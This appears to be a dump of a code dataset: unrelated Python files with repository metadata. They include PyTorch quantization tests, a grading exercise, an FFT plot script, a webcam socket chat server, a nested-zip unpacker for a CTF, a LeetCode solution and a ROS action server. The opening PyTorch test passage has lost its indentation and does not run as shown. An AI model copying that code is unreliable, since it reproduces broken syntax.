N, iC, H, W = 10, 10, 10, 3
oC, g, kH, kW = 16, 1, 3, 3
scale, zero_point = 1.0 / 255, 128
stride = (1, 1)
i_padding = (0, 0)
dilation = (1, 1)
X = torch.randn(N, iC, H, W, dtype=torch.float32)
X = X.permute([0, 2, 3, 1]).contiguous()
qX = torch.quantize_linear(X, scale=scale, zero_point=128, dtype=torch.quint8)
w = torch.randn(oC, iC // g, kH, kW, dtype=torch.float32)
qw = torch.quantize_linear(w, scale=scale, zero_point=0, dtype=torch.qint8)
b = torch.randn(oC, dtype=torch.float32) if use_bias else None
q_bias = torch.quantize_linear(b, scale=1.0 / 1024, zero_point=0, dtype=torch.qint32) if use_bias else None
q_filters_ref = torch.ops.quantized.fbgemm_conv_prepack(qw.permute([0, 2, 3, 1]),
stride,
i_padding,
dilation,
g)
requantized_bias = torch.quantize_linear(q_bias.dequantize(), scale * scale, 0 , torch.qint32) if use_bias else None
ref_result = torch.ops.quantized.fbgemm_conv2d(qX.permute([0, 2, 3, 1]), q_filters_ref,
requantized_bias, stride,
i_padding, dilation,
g, scale, zero_point).permute([0, 3, 1, 2])
q_result = torch.nn.quantized.functional.conv2d(qX,
qw,
bias=q_bias, scale=scale,
zero_point=zero_point,
stride=stride, padding=i_padding,
dilation=dilation, groups=g,
dtype=torch.quint8)
self.assertEqual(ref_result, q_result)
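# A small, hedged illustration (not one of the original tests) of the eager
# quantization round trip exercised above: quantize a float tensor, apply the
# functional relu, and dequantize for inspection. Values are illustrative only.
def _relu_roundtrip_sketch():
    x = torch.arange(-3, 3, dtype=torch.float)
    qx = torch.quantize_linear(x, scale=0.5, zero_point=3, dtype=torch.quint8)
    qy = qF.relu(qx)          # clamps the quantized values at the zero point
    return qy.dequantize()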
class DynamicModuleAPITest(QuantizationTestCase):
@no_deadline
@unittest.skipIf(
not torch.fbgemm_is_cpu_supported(),
" Quantized operations require FBGEMM. FBGEMM is only optimized for CPUs"
" with instruction set support avx2 or newer.",
)
@given(
batch_size=st.integers(1, 5),
in_features=st.integers(16, 32),
out_features=st.integers(4, 8),
use_bias=st.booleans(),
use_default_observer=st.booleans(),
)
def test_linear_api(self, batch_size, in_features, out_features, use_bias, use_default_observer):
"""test API functionality for nn.quantized.dynamic.Linear"""
W = torch.rand(out_features, in_features).float()
W_scale, W_zp = _calculate_dynamic_qparams(W, torch.qint8)
W_q = torch.quantize_linear(W, W_scale, W_zp, torch.qint8)
X = torch.rand(batch_size, in_features).float()
B = torch.rand(out_features).float() if use_bias else None
qlinear = nnqd.Linear(in_features, out_features)
# Run module with default-initialized parameters.
# This tests that the constructor is correct.
qlinear(X)
qlinear.set_weight(W_q)
# Simple round-trip test to ensure weight()/set_weight() API
self.assertEqual(qlinear.weight(), W_q)
W_pack = qlinear._packed_weight
qlinear.bias = B if use_bias else None
Z_dq = qlinear(X)
# Check if the module implementation matches calling the
# ops directly
Z_ref = torch.ops.quantized.fbgemm_linear_dynamic(X, W_pack, B)
self.assertEqual(Z_ref, Z_dq)
# Test serialization of dynamic quantized Linear Module using state_dict
model_dict = qlinear.state_dict()
self.assertEqual(model_dict['weight'], W_q)
if use_bias:
self.assertEqual(model_dict['bias'], B)
with tempfile.TemporaryFile() as f:
torch.save(model_dict, f)
f.seek(0)
loaded_dict = torch.load(f)
for key in model_dict:
self.assertEqual(model_dict[key], loaded_dict[key])
loaded_qlinear = nnqd.Linear(in_features, out_features)
loaded_qlinear.load_state_dict(loaded_dict)
linear_unpack = torch.ops.quantized.fbgemm_linear_unpack
self.assertEqual(linear_unpack(qlinear._packed_weight),
linear_unpack(loaded_qlinear._packed_weight))
if use_bias:
self.assertEqual(qlinear.bias, loaded_qlinear.bias)
self.assertTrue(dir(qlinear) == dir(loaded_qlinear))
self.assertTrue(hasattr(qlinear, '_packed_weight'))
self.assertTrue(hasattr(loaded_qlinear, '_packed_weight'))
self.assertTrue(hasattr(qlinear, 'weight'))
self.assertTrue(hasattr(loaded_qlinear, 'weight'))
self.assertEqual(qlinear.weight(), loaded_qlinear.weight())
self.assertEqual(qlinear.weight(), torch.ops.quantized.fbgemm_linear_unpack(qlinear._packed_weight))
Z_dq2 = qlinear(X)
self.assertEqual(Z_dq, Z_dq2)
# test serialization of module directly
with tempfile.TemporaryFile() as f:
torch.save(qlinear, f)
f.seek(0)
loaded = torch.load(f)
# This check is disabled pending an issue in PyTorch serialization:
# https://github.com/pytorch/pytorch/issues/24045
# self.assertEqual(qlinear.weight(), loaded.weight())
self.assertEqual(qlinear.zero_point, loaded.zero_point)
# Test JIT
self.checkScriptable(qlinear, list(zip([X], [Z_ref])), check_save_load=True)
# Test from_float
float_linear = torch.nn.Linear(in_features, out_features).float()
if use_default_observer:
float_linear.qconfig = torch.quantization.default_dynamic_qconfig
prepare_dynamic(float_linear)
float_linear(X.float())
quantized_float_linear = nnqd.Linear.from_float(float_linear)
# Smoke test to make sure the module actually runs
quantized_float_linear(X)
# Smoke test extra_repr
str(quantized_float_linear)
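# Hedged sketch (not one of the original tests): the high-level entry point for
# the dynamic path tested above. quantize_dynamic's exact signature here is an
# assumption based on the torch.quantization package imported at the top.
def _dynamic_linear_sketch():
    float_model = torch.nn.Linear(16, 4).float()
    qmodel = torch.quantization.quantize_dynamic(float_model)  # swaps in nnqd.Linear
    return qmodel(torch.rand(2, 16))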
class ModuleAPITest(QuantizationTestCase):
def test_relu(self):
relu_module = nnq.ReLU()
relu6_module = nnq.ReLU6()
x = torch.arange(-10, 10, dtype=torch.float)
y_ref = torch.relu(x)
y6_ref = torch.nn.modules.ReLU6()(x)
qx = torch.quantize_linear(x, 1.0, 0, dtype=torch.qint32)
qy = relu_module(qx)
qy6 = relu6_module(qx)
self.assertEqual(y_ref, qy.dequantize(),
message="ReLU module API failed")
self.assertEqual(y6_ref, qy6.dequantize(),
message="ReLU6 module API failed")
@no_deadline
@unittest.skipIf(
not torch.fbgemm_is_cpu_supported(),
" Quantized operations require FBGEMM. FBGEMM is only optimized for CPUs"
" with instruction set support avx2 or newer.",
)
@given(
batch_size=st.integers(1, 5),
in_features=st.integers(16, 32),
out_features=st.integers(4, 8),
use_bias=st.booleans(),
use_fused=st.booleans(),
)
def test_linear_api(self, batch_size, in_features, out_features, use_bias, use_fused):
"""test API functionality for nn.quantized.linear and nn._intrinsic.quantized.linear_relu"""
W = torch.rand(out_features, in_features).float()
W_q = torch.quantize_linear(W, 0.1, 4, torch.qint8)
X = torch.rand(batch_size, in_features).float()
X_q = torch.quantize_linear(X, 0.2, 10, torch.quint8)
B = torch.rand(out_features).float() if use_bias else None
B_q = torch.quantize_linear(B, W_q.q_scale() * X_q.q_scale(), 0, torch.qint32) if use_bias else None
scale = 0.5
zero_point = 3
if use_fused:
qlinear = nnq_fused.LinearReLU(in_features, out_features)
else:
qlinear = nnq.Linear(in_features, out_features)
# Run module with default-initialized parameters.
# This tests that the constructor is correct.
qlinear(X_q)
qlinear.set_weight(W_q)
# Simple round-trip test to ensure weight()/set_weight() API
self.assertEqual(qlinear.weight(), W_q)
W_pack = qlinear._packed_weight
qlinear.bias = B_q if use_bias else None
qlinear.scale = float(scale)
qlinear.zero_point = int(zero_point)
Z_q = qlinear(X_q)
# Check if the module implementation matches calling the
# ops directly
if use_fused:
Z_ref = torch.ops.quantized.fbgemm_linear_relu(X_q, W_pack, B_q, scale, zero_point)
else:
Z_ref = torch.ops.quantized.fbgemm_linear(X_q, W_pack, B_q, scale, zero_point)
self.assertEqual(Z_ref, Z_q)
# Test serialization of quantized Linear Module using state_dict
model_dict = qlinear.state_dict()
self.assertEqual(model_dict['weight'], W_q)
if use_bias:
self.assertEqual(model_dict['bias'], B_q)
with tempfile.TemporaryFile() as f:
torch.save(model_dict, f)
f.seek(0)
loaded_dict = torch.load(f)
for key in model_dict:
self.assertEqual(model_dict[key], loaded_dict[key])
if use_fused:
loaded_qlinear = nnq_fused.LinearReLU(in_features, out_features)
else:
loaded_qlinear = nnq.Linear(in_features, out_features)
loaded_qlinear.load_state_dict(loaded_dict)
linear_unpack = torch.ops.quantized.fbgemm_linear_unpack
self.assertEqual(linear_unpack(qlinear._packed_weight),
linear_unpack(loaded_qlinear._packed_weight))
if use_bias:
self.assertEqual(qlinear.bias, loaded_qlinear.bias)
self.assertEqual(qlinear.scale, loaded_qlinear.scale)
self.assertEqual(qlinear.zero_point, loaded_qlinear.zero_point)
self.assertTrue(dir(qlinear) == dir(loaded_qlinear))
self.assertTrue(hasattr(qlinear, '_packed_weight'))
self.assertTrue(hasattr(loaded_qlinear, '_packed_weight'))
self.assertTrue(hasattr(qlinear, 'weight'))
self.assertTrue(hasattr(loaded_qlinear, 'weight'))
self.assertEqual(qlinear.weight(), loaded_qlinear.weight())
self.assertEqual(qlinear.weight(), torch.ops.quantized.fbgemm_linear_unpack(qlinear._packed_weight))
Z_q2 = loaded_qlinear(X_q)
self.assertEqual(Z_q, Z_q2)
# test serialization of module directly
with tempfile.TemporaryFile() as f:
torch.save(qlinear, f)
f.seek(0)
loaded = torch.load(f)
# This check is disabled pending an issue in PyTorch serialization:
# https://github.com/pytorch/pytorch/issues/24045
# self.assertEqual(qlinear.weight(), loaded.weight())
self.assertEqual(qlinear.bias, loaded.bias)
self.assertEqual(qlinear.scale, loaded.scale)
self.assertEqual(qlinear.zero_point, loaded.zero_point)
# Test JIT
self.checkScriptable(qlinear, list(zip([X_q], [Z_ref])), check_save_load=True)
# Test from_float
float_linear = torch.nn.Linear(in_features, out_features).float()
float_linear.qconfig = torch.quantization.default_qconfig
torch.quantization.prepare(float_linear)
float_linear(X.float())
quantized_float_linear = torch.quantization.convert(float_linear)
# Smoke test to make sure the module actually runs
quantized_float_linear(X_q)
# Smoke test extra_repr
str(quantized_float_linear)
def test_quant_dequant_api(self):
r = torch.tensor([[1., -1.], [1., -1.]], dtype=torch.float)
scale, zero_point, dtype = 1.0, 2, torch.qint8
# testing Quantize API
qr = torch.quantize_linear(r, scale, zero_point, dtype)
quant_m = nnq.Quantize(scale, zero_point, dtype)
qr2 = quant_m(r)
self.assertEqual(qr, qr2)
# testing Dequantize API
rqr = qr.dequantize()
dequant_m = nnq.DeQuantize()
rqr2 = dequant_m(qr2)
self.assertEqual(rqr, rqr2)
@no_deadline
@unittest.skipIf(
not torch.fbgemm_is_cpu_supported(),
" Quantized operations require FBGEMM. FBGEMM is only optimized for CPUs"
" with instruction set support avx2 or newer.",
)
@given(
use_bias=st.booleans(),
use_fused=st.booleans(),
)
def test_conv_api(self, use_bias, use_fused):
"""Tests the correctness of the conv module.
The correctness is defined against the functional implementation.
"""
N, iC, H, W = 10, 10, 10, 3
oC, g, kH, kW = 16, 1, 3, 3
scale, zero_point = 1.0 / 255, 128
X = torch.randn(N, iC, H, W, dtype=torch.float32)
X = X.permute([0, 2, 3, 1]).contiguous()
qX = torch.quantize_linear(X, scale=scale, zero_point=128, dtype=torch.quint8)
w = torch.randn(oC, iC // g, kH, kW, dtype=torch.float32)
qw = torch.quantize_linear(w, scale=scale, zero_point=0, dtype=torch.qint8)
b = torch.randn(oC, dtype=torch.float32) if use_bias else None
qb = torch.quantize_linear(b, scale=1.0 / 1024, zero_point=0, dtype=torch.qint32) if use_bias else None
if use_fused:
conv_under_test = ConvReLU2d(in_channels=iC,
out_channels=oC,
kernel_size=(kH, kW),
stride=1,
padding=0,
dilation=1,
groups=g,
bias=use_bias,
padding_mode='zeros')
else:
conv_under_test = Conv2d(in_channels=iC,
out_channels=oC,
kernel_size=(kH, kW),
stride=1,
padding=0,
dilation=1,
groups=g,
bias=use_bias,
padding_mode='zeros')
# Run module with default-initialized parameters.
# This tests that the constructor is correct.
conv_under_test(qX)
conv_under_test.set_weight(qw)
conv_under_test.bias = qb
conv_under_test.scale = scale
conv_under_test.zero_point = zero_point
# Test members
self.assertTrue(hasattr(conv_under_test, '_packed_weight'))
self.assertTrue(hasattr(conv_under_test, 'scale'))
self.assertTrue(hasattr(conv_under_test, 'zero_point'))
# Test properties
self.assertEqual(qw, conv_under_test.weight())
self.assertEqual(qb, conv_under_test.bias)
self.assertEqual(scale, conv_under_test.scale)
self.assertEqual(zero_point, conv_under_test.zero_point)
# Test forward
result_under_test = conv_under_test(qX)
result_reference = qF.conv2d(qX, qw, bias=qb,
scale=scale, zero_point=zero_point,
stride=1, padding=0,
dilation=1, groups=g, dtype=torch.quint8
)
if use_fused:
# result_reference < zero_point doesn't work for qtensor yet
# result_reference[result_reference < zero_point] = zero_point
MB, OC, OH, OW = result_reference.size()
for i in range(MB):
for j in range(OC):
for h in range(OH):
for w in range(OW):
if result_reference[i][j][h][w].int_repr() < zero_point:
# assign 0. that gets converted to zero_point
result_reference[i][j][h][w] = 0.
self.assertEqual(result_reference, result_under_test,
message="Tensors are not equal.")
# Test serialization of quantized Conv Module using state_dict
model_dict = conv_under_test.state_dict()
self.assertEqual(model_dict['weight'], qw)
if use_bias:
self.assertEqual(model_dict['bias'], qb)
with tempfile.NamedTemporaryFile() as f:
torch.save(model_dict, f)
f.seek(0)
loaded_dict = torch.load(f)
for key in model_dict:
self.assertEqual(loaded_dict[key], model_dict[key])
if use_fused:
loaded_conv_under_test = ConvReLU2d(in_channels=iC,
out_channels=oC,
kernel_size=(kH, kW),
stride=1,
padding=0,
dilation=1,
groups=g,
bias=use_bias,
padding_mode='zeros')
else:
loaded_conv_under_test = Conv2d(in_channels=iC,
out_channels=oC,
kernel_size=(kH, kW),
stride=1,
padding=0,
dilation=1,
groups=g,
bias=use_bias,
padding_mode='zeros')
loaded_conv_under_test.load_state_dict(loaded_dict)
self.assertEqual(loaded_conv_under_test.weight(), conv_under_test.weight())
if use_bias:
self.assertEqual(loaded_conv_under_test.bias, conv_under_test.bias)
self.assertEqual(loaded_conv_under_test.scale, conv_under_test.scale)
self.assertEqual(loaded_conv_under_test.zero_point, conv_under_test.zero_point)
self.assertTrue(dir(loaded_conv_under_test) == dir(conv_under_test))
self.assertTrue(hasattr(conv_under_test, '_packed_weight'))
self.assertTrue(hasattr(loaded_conv_under_test, '_packed_weight'))
self.assertTrue(hasattr(conv_under_test, 'weight'))
self.assertTrue(hasattr(loaded_conv_under_test, 'weight'))
self.assertEqual(loaded_conv_under_test.weight(), conv_under_test.weight())
self.assertEqual(loaded_conv_under_test.weight(), qw)
loaded_result = loaded_conv_under_test(qX)
self.assertEqual(loaded_result, result_reference)
with tempfile.NamedTemporaryFile() as f:
torch.save(conv_under_test, f)
f.seek(0)
loaded_conv = torch.load(f)
self.assertEqual(conv_under_test.bias, loaded_conv.bias)
self.assertEqual(conv_under_test.scale, loaded_conv.scale)
self.assertEqual(conv_under_test.zero_point, loaded_conv.zero_point)
# JIT testing
self.checkScriptable(conv_under_test, list(zip([qX], [result_reference])), check_save_load=True)
# Test from_float
float_conv = torch.nn.Conv2d(in_channels=iC,
out_channels=oC,
kernel_size=(kH, kW),
stride=1,
padding=0,
dilation=1,
groups=g,
bias=use_bias,
padding_mode='zeros').float()
float_conv.qconfig = torch.quantization.default_qconfig
torch.quantization.prepare(float_conv)
float_conv(X.float())
quantized_float_conv = torch.quantization.convert(float_conv)
# Smoke test to make sure the module actually runs
quantized_float_conv(qX)
# Check that bias is quantized based on output scale
if use_bias:
qbias = torch.quantize_linear(float_conv.bias, quantized_float_conv.scale / 2**16, 0, torch.qint32)
self.assertEqual(quantized_float_conv.bias.dequantize(), qbias.dequantize())
# Smoke test extra_repr
str(quantized_float_conv)
def test_pool_api(self):
"""Tests the correctness of the pool module.
The correctness is defined against the functional implementation.
"""
N, C, H, W = 10, 10, 10, 3
kwargs = {
'kernel_size': 2,
'stride': None,
'padding': 0,
'dilation': 1
}
scale, zero_point = 1.0 / 255, 128
X = torch.randn(N, C, H, W, dtype=torch.float32)
qX = torch.quantize_linear(X, scale=scale, zero_point=zero_point,
dtype=torch.quint8)
qX_expect = torch.nn.functional.max_pool2d(qX, **kwargs)
pool_under_test = torch.nn.quantized.MaxPool2d(**kwargs)
qX_hat = pool_under_test(qX)
self.assertEqual(qX_expect, qX_hat)
# JIT Testing
self.checkScriptable(pool_under_test, list(zip([X], [qX_expect])))
if __name__ == '__main__':
run_tests()
| [
"[email protected]"
] | |
6142e7a74039e267ec08477e21952b9991b89888 | 4ee5affb8b16ff7d26df9b19ffee8d675df11e4e | /nested-loops/train_the_trainers.py | ce76aebb5569e2ac15837eb95cccaa5edc35603a | [] | no_license | ayk-dev/python-basics | f60849f6502d64445105a0d27272d9910ea1d509 | af6d04f9001d9a45e8474f9bd4fa2b3ebe380c97 | refs/heads/main | 2023-01-12T11:56:12.210880 | 2020-11-17T20:06:40 | 2020-11-17T20:06:40 | 311,747,624 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 594 | py | n = int(input()) # number of people in jury
presentation_counter = 0
presentaion = input()
all_presentations_grades = 0
while presentaion != 'Finish':
total = 0
for pres in range(1, n + 1):
grade = float(input())
total += grade
average_grade = total / n
all_presentations_grades += average_grade
print(f'{presentaion} - {average_grade:.2f}.')
presentaion = input()
presentation_counter += 1
final_average = all_presentations_grades / presentation_counter
print(f"Student's final assessment is {final_average:.2f}.")
| [
"[email protected]"
] | |
ba50261f4095195e91f34f82c65ee1d79a2c97aa | 5e87661f1ddba14b750b374eff4a15bcda6c4ce1 | /ex1.py | b3d17b6c2117daba7a4625d607bfaf77c1d601e8 | [] | no_license | gabe32130/AST4320-A2 | cf894a9c798e15d6076ee7170a878d83593a656c | 7a17d2c491e8d5818de45180b2849b4abd865211 | refs/heads/master | 2021-07-16T04:00:16.787186 | 2017-10-20T16:16:04 | 2017-10-20T16:16:04 | 107,699,443 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,786 | py | import pylab as pl
import numpy as np
import cmath as m
from scipy.fftpack import fft, ifft
import matplotlib.pyplot as plt
from matplotlib import rc
from scipy.interpolate import UnivariateSpline
import pylab as pl
#plot the step function
step=1000
x=np.linspace(-10, 10, step)
xn=np.zeros(len(x))
xp=np.zeros(len(x))
Wx=np.zeros(len(x))
Wxn=np.zeros(len(x))
Wxp=np.zeros(len(x))
R=6.5
for i in range (len(x)):
if x[i] <0:
xn[i]=x[i]
if abs(xn[i]) < R:
Wxn[i]=1
else:
Wxn[i]=0
else:
xn[i]=0
for i in range (len(x)):
if x[i] >0:
xp[i]=x[i]
if abs(xp[i]) < R:
Wxp[i]=1
else:
Wxp[i]=0
else:
xp[i]=0
x= xn+xp
Wx=Wxn+Wxp
plt.plot(x,Wx, label=r'linewidth')
plt.xlabel(r'x', size=14)
plt.ylabel(r'W(x)', size=14)
plt.ylim([0,2])
plt.legend(fontsize=14)
plt.savefig("fig1.pdf",bbox_inches='tight')
plt.show()
################################################################################
#Fourier Transform
W_f=np.zeros(len(x))
k=x
W_f = np.sin(2.0*R*k)/(2.0*np.pi*k)
plt.plot(x,W_f, label=r'linewidth')
plt.xlabel(r'x', size=14)
plt.ylabel(r'W(f)', size=14)
plt.ylim([-0.5,2.5])
plt.legend(fontsize=14)
plt.savefig("fig2.pdf",bbox_inches='tight')
plt.show()
################################################################################
#FWHM
half_max=np.max(W_f)/2
print (half_max)
#max_x = x[W_f.index(half_max)]
#print (max_x)
#indx=x.index(-0.14695)
#print (indx)
x_curve = UnivariateSpline(x, W_f, s=0)
r=x_curve.roots()
L=len(r)
#print (L)
max= (L/2)-2
min= (L/2)-1
r1=r[40]
r2=r[41]
FWHM=abs(r1-r2)
print(FWHM)
pl.plot(x, W_f)
pl.axvspan(r1, r2, facecolor='g', alpha=0.5)
plt.savefig("fig3.pdf",bbox_inches='tight')
pl.show()
#-0.14695
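# Hedged alternative (not in the original script): the usual spline trick for a
# FWHM is to take the roots of the curve shifted down by half its maximum, so
# the two crossings bracketing the peak are found without hand-picking indices
# such as r[40] and r[41] above.
# half_curve = UnivariateSpline(x, W_f - half_max, s=0)
# crossings = half_curve.roots()           # pick the pair straddling the peak
# print(abs(crossings[1] - crossings[0]))  # assumes the first two bracket it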
| [
"[email protected]"
] | |
505e6466c3ca23f5decd5203746f71c43373cbe0 | 794bb12645c8f502cde6506afa684bc435d85ae7 | /VideoChat_server.py | 759b26f0c8ea72106c5c813b6973ba68b200d497 | [] | no_license | natasha012/Live-Video-Streaming-Chat-App | 4cefa0321a21b9d8e46a765dab47ac013b67e64f | 8ac8af829e3fae9a5dd7dcb6e04735910dcbaccf | refs/heads/main | 2023-05-25T20:41:41.121269 | 2021-06-10T12:35:04 | 2021-06-10T12:35:04 | 375,691,103 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 836 | py | import os
import cv2
import numpy as np
import socket
cap=cv2.VideoCapture(1)
# Create Socket
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ip="192.168.56.1"
port=8888
# Socket Binding
s.bind((ip,port))
s.listen(5)
# Listening and waiting for connection
conn,addr = s.accept()
while True:
data = conn.recv(90456)
# Decode the image
    arry = np.frombuffer(data, np.uint8)  # np.fromstring is deprecated for raw bytes
photo = cv2.imdecode(arry, cv2.IMREAD_COLOR)
if type(photo) is type(None):
pass
else:
cv2.imshow("SERVER-SCREEN",photo)
if cv2.waitKey(10)==13:
break
stat,photo=cap.read()
# Encode image and send via network
photo_data = cv2.imencode('.jpg', photo)[1].tobytes()
conn.sendall(photo_data)
cv2.destroyAllWindows()
cap.release()
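# Hedged improvement sketch (not used above): a bare recv(90456) has no message
# boundaries, so JPEG frames can split or merge. A common fix is a 4-byte
# length prefix per frame, as in these helpers:
import struct

def send_frame(sock, payload):
    sock.sendall(struct.pack(">I", len(payload)) + payload)

def _recv_exact(sock, size):
    buf = b""
    while len(buf) < size:
        chunk = sock.recv(size - len(buf))
        if not chunk:
            raise ConnectionError("socket closed mid-frame")
        buf += chunk
    return buf

def recv_frame(sock):
    (size,) = struct.unpack(">I", _recv_exact(sock, 4))
    return _recv_exact(sock, size)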
os.system("cls") | [
"[email protected]"
] | |
70e545ac170d761713d00f1976876cde10b88210 | c6a69fb99ecf609404201a63d33d339162eb400b | /脚本/压缩包解压套娃.py | 36c0226152a077e4cfd8fc4eb3e96995d15a4946 | [] | no_license | npfs06/CTF-Tools | 519e7f51c3fde64027519f370bf9204a34abfb86 | 2334b715ad849bdf2f48d2b6225990062c8e2aa3 | refs/heads/main | 2023-07-05T02:37:19.265394 | 2021-08-25T01:13:58 | 2021-08-25T01:13:58 | 399,643,092 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 266 | py | import zipfile
def lalala(zipname):
    # Each layer's password is its own base name (the text before the first dot).
    while True:
        passwd = zipname.split(".")[0]
        try:
            zf = zipfile.ZipFile(zipname, 'r')
        except zipfile.BadZipFile:
            break  # innermost payload reached: it is not a zip archive
        zf.extractall(pwd=passwd.encode())
        zipname = zf.namelist()[0]  # descend into the file just extracted
        zf.close()
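# Hedged variant (not in the original script): probe the file type first so the
# loop ends cleanly and hands back the innermost extracted path.
def unnest(zipname):
    while zipfile.is_zipfile(zipname):
        with zipfile.ZipFile(zipname) as zf:
            zf.extractall(pwd=zipname.split(".")[0].encode())
            zipname = zf.namelist()[0]
    return zipname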
lalala("hW1ES89jF.tar.gz") | [
"[email protected]"
] | |
52564c55ce188af128e41cc3810567e62b0cb71c | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/otherforms/_wisecracked.py | df762aa40f8d90ebf7ab0b38869d1bab6c31eb7e | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 236 | py |
# class header
class _WISECRACKED():
def __init__(self,):
self.name = "WISECRACKED"
        self.definitions = ["wisecrack"]  # placeholder: the original definition text was lost; quoted so the module loads
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.basic = ['wisecrack']
| [
"[email protected]"
] | |
ff22176a2b050a193f1882462e0d36e591e42784 | cb0e7d6493b23e870aa625eb362384a10f5ee657 | /solutions/python3/0567.py | 65478b7cc2fb087117f7698fe743cdccb13f091a | [] | no_license | sweetpand/LeetCode-1 | 0acfa603af254a3350d457803449a91322f2d1a7 | 65f4ef26cb8b2db0b4bf8c42bfdc76421b479f94 | refs/heads/master | 2022-11-14T07:01:42.502172 | 2020-07-12T12:25:56 | 2020-07-12T12:25:56 | 279,088,171 | 1 | 0 | null | 2020-07-12T15:03:20 | 2020-07-12T15:03:19 | null | UTF-8 | Python | false | false | 500 | py | class Solution:
def checkInclusion(self, s1: str, s2: str) -> bool:
count1 = collections.Counter(s1)
required = len(s1)
for r, c in enumerate(s2):
count1[c] -= 1
if count1[c] >= 0:
required -= 1
if r >= len(s1):
count1[s2[r - len(s1)]] += 1
if count1[s2[r - len(s1)]] > 0:
required += 1
if required == 0:
return True
return False
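if __name__ == "__main__":
    # Sample cases from the problem statement
    print(Solution().checkInclusion("ab", "eidbaooo"))  # True  ("ba" is a window of s2)
    print(Solution().checkInclusion("ab", "eidboaoo"))  # False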
| [
"[email protected]"
] | |
5011edd540e59266a4dab322eeabf74f75d8df9e | 76db1e651dba6c639e61a5c251583390ffd60b93 | /kConcatenationMaxSum.py | 8098b05eaf3abe2b55ad64af0efd551a19fee2d5 | [] | no_license | keenouter/leetcode | 58127ece6d4f76a4e80a00ec564ee46143d72232 | ebb485d7fdb9c3df9669ecf94315ebc0a836977f | refs/heads/master | 2022-04-24T06:56:27.982291 | 2020-04-30T06:34:10 | 2020-04-30T06:34:10 | 260,130,556 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,550 | py | class Solution:
def kConcatenationMaxSum(self, arr, k):
# max_index=0
# max_child_sum=0
# arr_sum=0
# temp=0
# min_sum=0
# max_sum=0
# for i in range(len(arr)):
# arr_sum+=arr[i]
# if temp>0:
# if temp>max_child_sum:
# max_child_sum=temp
# max_index=i
# temp+=arr[i]
# elif temp<=0:
# if arr[i]<=0:
# temp=0
# else:
# temp=arr[i]
# if arr_sum<min_sum:
# min_sum=arr_sum
# if arr_sum>max_sum:
# max_sum=arr_sum
# if temp>max_child_sum:
# max_child_sum=temp
# max_index= len(arr)
# print(arr_sum,max_child_sum,temp)
# return max([arr_sum*k-min_sum,arr_sum*(k-1)+sum(arr[:max_index])-min_sum,max_child_sum,temp+max_sum,0])
        # Kadane's maximum-subarray scan over at most two copies of arr covers
        # every window that can cross one concatenation boundary; each extra
        # copy beyond two can only add the full array sum when it is positive.
        MOD = 10 ** 9 + 7

        def kadane(a):
            best = cur = 0
            for x in a:
                cur = max(cur + x, x)
                best = max(best, cur)
            return best

        if k == 1:
            return kadane(arr) % MOD
        return (kadane(arr * 2) + (k - 2) * max(sum(arr), 0)) % MOD
print(Solution().kConcatenationMaxSum([1,2,3],3))
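# For [1,2,3] with k=3 the answer is 18 (the whole tripled array).
print(Solution().kConcatenationMaxSum([-1, 4, -2], 2))  # hedged extra check: expect 5 (window 4,-2,-1,4)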
| [
"[email protected]"
] | |
372c0a5bf62df64d0962abad6fd583321f129e17 | ebf9a2a442dc3710129fb73ae432d1050098b01c | /joint_motion_server.py | 56243d5d9ff8e8010bcfdb730e649e67e904a8ad | [] | no_license | iskandersauma/stomp-chomp | f8f4bcf55946287e029ddfbe2186b637d6dd56df | 22b228350e80dcba2baa438e9c1199fb2a6ac44d | refs/heads/master | 2022-07-31T20:18:46.100687 | 2020-05-24T17:40:59 | 2020-05-24T17:40:59 | 266,592,570 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,534 | py | #! /usr/bin/env python
import rospy
import actionlib
import asp_tools.msg
from asp_tools.srv import MoveJoints
from abstract_motion_server import AbstractMotionServer
class JointMotionAction(AbstractMotionServer):
def __init__(self, name):
super(JointMotionAction, self).__init__(name)
def _init_server(self):
self._feedback = asp_tools.msg.JointMotionFeedback()
self._result = asp_tools.msg.JointMotionResult()
self._as = actionlib.SimpleActionServer(self._action_name, asp_tools.msg.JointMotionAction, execute_cb=self.execute_cb, auto_start = False)
def call_service(self, goal):
"""
        Calls the motion service. Returns an (executed, planned) pair of
        booleans describing whether the motion was executed and planned.
"""
# publish info to the console for the user
rospy.loginfo('%s: Executing the joint motion action' % (self._action_name))
rospy.wait_for_service('/asp/move_joints')
try:
self.plan_executed = False
move_joints = rospy.ServiceProxy('/asp/move_joints', MoveJoints)
resp = move_joints(x=goal.x, y=goal.y, b=goal.b, z=goal.z, a=goal.a, async=True)
executed, planned = resp.executed, resp.planned
except rospy.ServiceException, e:
print "move_joints service call failed: %s"%e
executed, planned = False, False
return executed, planned
if __name__ == '__main__':
rospy.init_node('joint_motion')
server = JointMotionAction(rospy.get_name())
rospy.spin()
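# Hedged client-side sketch (not part of this node; the action name and field
# values are assumptions): how a caller could exercise this action server.
# import rospy, actionlib, asp_tools.msg
# rospy.init_node('joint_motion_client')
# client = actionlib.SimpleActionClient('joint_motion', asp_tools.msg.JointMotionAction)
# client.wait_for_server()
# client.send_goal(asp_tools.msg.JointMotionGoal(x=0.1, y=0.2, b=0.0, z=0.3, a=0.0))
# client.wait_for_result()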
| [
"[email protected]"
] | |
9cd50b1e4b2cea56a81f0057f7a4137c0153622c | 39a8bb0bcbca9a9e25705decead580602dbcfd2b | /meraki_cisco_parser.py | 9b945c602780e21342c7524f27ddcc68efaa9c2d | [] | no_license | NickVK9/Cisco-Meraki-Selenium-project | 1e1fa829d763564d7c60cc2830bcef9392946a30 | 59fe8ed7d69293d2df3d709dbc13efbed4a84c98 | refs/heads/master | 2020-11-28T08:42:16.639710 | 2019-12-25T06:41:37 | 2019-12-25T06:41:37 | 229,759,425 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 4,012 | py | from selenium import webdriver
